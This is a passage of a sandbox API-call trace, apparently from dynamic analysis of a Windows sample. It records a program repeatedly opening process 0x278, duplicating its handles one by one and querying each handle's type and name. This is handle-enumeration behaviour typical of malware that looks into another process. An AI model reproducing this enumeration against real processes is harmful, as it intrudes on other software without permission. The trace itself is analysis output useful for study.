dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0114.049] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0114.049] CloseHandle (hObject=0x1b8) returned 1 [0114.050] CloseHandle (hObject=0x198) returned 1 [0114.050] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x278) returned 0x198 [0114.050] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x580, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0114.050] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0114.050] CloseHandle (hObject=0x1b8) returned 1 [0114.050] CloseHandle (hObject=0x198) returned 1 [0114.050] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x278) returned 0x198 [0114.050] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x584, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0114.050] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0114.050] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x80) returned 0x32e40850 [0114.051] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x2, ObjectInformation=0x32e40850, ObjectInformationLength=0x7e, ReturnLength=0xce88c | out: ObjectInformation=0x32e40850, ReturnLength=0xce88c) returned 0xc0000004 [0114.051] CloseHandle (hObject=0x1b8) returned 1 [0114.051] CloseHandle (hObject=0x198) returned 1 [0114.051] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x278) returned 0x198 [0114.051] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x588, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0114.051] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0114.051] CloseHandle (hObject=0x1b8) returned 1 [0114.051] CloseHandle (hObject=0x198) returned 1 [0114.051] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x278) returned 0x198 [0114.052] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x58c, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0114.052] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0114.052] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x80) returned 0x32e40850 [0114.052] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x2, ObjectInformation=0x32e40850, ObjectInformationLength=0x7e, ReturnLength=0xce88c | out: ObjectInformation=0x32e40850, ReturnLength=0xce88c) returned 0xc0000004 [0114.052] CloseHandle (hObject=0x1b8) returned 1 [0114.052] CloseHandle (hObject=0x198) returned 1 [0114.052] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x278) returned 0x198 [0114.052] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x590, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0114.052] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0114.053] CloseHandle (hObject=0x1b8) returned 1 [0114.053] CloseHandle (hObject=0x198) returned 1 [0114.053] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x278) returned 0x198 [0114.053] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x594, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0114.053] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0114.053] CloseHandle (hObject=0x1b8) returned 1 [0114.053] CloseHandle (hObject=0x198) returned 1 [0114.053] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x278) returned 0x198 [0114.054] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x598, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0114.054] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0114.054] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x80) returned 0x32e40850 [0114.054] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x2, ObjectInformation=0x32e40850, ObjectInformationLength=0x7e, ReturnLength=0xce88c | out: ObjectInformation=0x32e40850, ReturnLength=0xce88c) returned 0xc0000004 [0114.054] CloseHandle (hObject=0x1b8) returned 1 [0114.054] CloseHandle (hObject=0x198) returned 1 [0114.054] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x278) returned 0x198 [0114.054] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x59c, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0114.054] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0114.055] CloseHandle (hObject=0x1b8) returned 1 [0114.055] CloseHandle (hObject=0x198) returned 1 [0114.055] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x278) returned 0x198 [0114.055] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x5a0, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0114.055] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0114.055] CloseHandle (hObject=0x1b8) returned 1 [0114.055] CloseHandle (hObject=0x198) returned 1 [0114.055] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x278) returned 0x198 [0114.055] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x5a4, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0114.056] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0114.056] CloseHandle (hObject=0x1b8) returned 1 [0114.056] CloseHandle (hObject=0x198) returned 1 [0114.056] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x278) returned 0x198 [0114.056] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x5a8, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0114.056] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0114.056] CloseHandle (hObject=0x1b8) returned 1 [0114.056] CloseHandle (hObject=0x198) returned 1 [0114.056] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x278) returned 0x198 [0114.057] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x5ac, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0114.057] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0114.057] CloseHandle (hObject=0x1b8) returned 1 [0114.057] CloseHandle (hObject=0x198) returned 1 [0114.057] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x278) returned 0x198 [0114.057] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x5b0, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0114.057] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0114.057] CloseHandle (hObject=0x1b8) returned 1 [0114.058] CloseHandle (hObject=0x198) returned 1 [0114.058] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x278) returned 0x198 [0114.058] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x5b4, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0114.058] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0114.058] CloseHandle (hObject=0x1b8) returned 1 [0114.058] CloseHandle (hObject=0x198) returned 1 [0114.058] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x278) returned 0x198 [0114.058] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x5b8, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0114.058] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0114.058] CloseHandle (hObject=0x1b8) returned 1 [0114.059] CloseHandle (hObject=0x198) returned 1 [0114.059] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x278) returned 0x198 [0114.059] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x5bc, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x0) returned 0 [0114.059] CloseHandle (hObject=0x198) returned 1 [0114.059] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x278) returned 0x198 [0114.059] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x5c0, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0114.059] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0114.059] CloseHandle (hObject=0x1b8) returned 1 [0114.059] CloseHandle (hObject=0x198) returned 1 [0114.059] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x278) returned 0x198 [0114.060] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x5c4, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0114.060] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0114.060] CloseHandle (hObject=0x1b8) returned 1 [0114.060] CloseHandle (hObject=0x198) returned 1 [0114.060] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x278) returned 0x198 [0114.060] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x5c8, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0114.060] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0114.060] CloseHandle (hObject=0x1b8) returned 1 [0114.060] CloseHandle (hObject=0x198) returned 1 [0114.061] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x278) returned 0x198 [0114.061] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x5cc, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0114.061] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0114.061] CloseHandle (hObject=0x1b8) returned 1 [0114.061] CloseHandle (hObject=0x198) returned 1 [0114.061] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x278) returned 0x198 [0114.061] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x5d0, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0114.061] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0114.061] CloseHandle (hObject=0x1b8) returned 1 [0114.062] CloseHandle (hObject=0x198) returned 1 [0114.062] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x278) returned 0x198 [0114.062] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x5d4, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0114.062] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0114.062] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x80) returned 0x32e40850 [0114.062] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x2, ObjectInformation=0x32e40850, ObjectInformationLength=0x7e, ReturnLength=0xce88c | out: ObjectInformation=0x32e40850, ReturnLength=0xce88c) returned 0xc0000004 [0114.062] CloseHandle (hObject=0x1b8) returned 1 [0114.062] CloseHandle (hObject=0x198) returned 1 [0114.063] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x278) returned 0x198 [0114.063] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x5d8, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0114.063] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0114.063] CloseHandle (hObject=0x1b8) returned 1 [0114.063] CloseHandle (hObject=0x198) returned 1 [0114.063] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x278) returned 0x198 [0114.064] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x5dc, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x0) returned 0 [0114.064] CloseHandle (hObject=0x198) returned 1 [0114.064] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x278) returned 0x198 [0114.064] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x5e0, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0114.064] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0114.064] CloseHandle (hObject=0x1b8) returned 1 [0114.065] CloseHandle (hObject=0x198) returned 1 [0114.065] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x278) returned 0x198 [0114.065] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x5e4, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0114.065] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0114.065] CloseHandle (hObject=0x1b8) returned 1 [0114.065] CloseHandle (hObject=0x198) returned 1 [0114.065] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x278) returned 0x198 [0114.065] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x5e8, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0114.065] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0114.066] CloseHandle (hObject=0x1b8) returned 1 [0114.066] CloseHandle (hObject=0x198) returned 1 [0114.066] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x278) returned 0x198 [0114.066] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x5ec, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x0) returned 0 [0114.066] CloseHandle (hObject=0x198) returned 1 [0114.066] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x278) returned 0x198 [0114.066] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x5f0, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0114.066] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0114.067] CloseHandle (hObject=0x1b8) returned 1 [0114.067] CloseHandle (hObject=0x198) returned 1 [0114.067] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x278) returned 0x198 [0114.067] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x5f4, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0114.067] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0114.067] CloseHandle (hObject=0x1b8) returned 1 [0114.067] CloseHandle (hObject=0x198) returned 1 [0114.067] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x278) returned 0x198 [0114.067] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x5f8, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0114.068] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0114.068] CloseHandle (hObject=0x1b8) returned 1 [0114.068] CloseHandle (hObject=0x198) returned 1 [0114.068] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x278) returned 0x198 [0114.068] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x5fc, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0114.068] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0114.068] CloseHandle (hObject=0x1b8) returned 1 [0114.069] CloseHandle (hObject=0x198) returned 1 [0114.069] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x278) returned 0x198 [0114.075] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x600, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0114.075] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0114.075] CloseHandle (hObject=0x1b8) returned 1 [0114.076] CloseHandle (hObject=0x198) returned 1 [0114.076] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x278) returned 0x198 [0114.076] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x604, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0114.076] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0114.076] CloseHandle (hObject=0x1b8) returned 1 [0114.076] CloseHandle (hObject=0x198) returned 1 [0114.076] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x278) returned 0x198 [0114.076] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x608, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0114.077] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0114.077] CloseHandle (hObject=0x1b8) returned 1 [0114.077] CloseHandle (hObject=0x198) returned 1 [0114.077] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x278) returned 0x198 [0114.077] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x60c, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0114.077] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0114.077] CloseHandle (hObject=0x1b8) returned 1 [0114.077] CloseHandle (hObject=0x198) returned 1 [0114.078] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x278) returned 0x198 [0114.078] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x610, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0114.078] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0114.078] CloseHandle (hObject=0x1b8) returned 1 [0114.078] CloseHandle (hObject=0x198) returned 1 [0114.078] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x278) returned 0x198 [0114.078] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x614, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0114.078] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0114.079] CloseHandle (hObject=0x1b8) returned 1 [0114.079] CloseHandle (hObject=0x198) returned 1 [0114.079] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x278) returned 0x198 [0114.079] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x618, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0114.079] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0114.079] CloseHandle (hObject=0x1b8) returned 1 [0114.079] CloseHandle 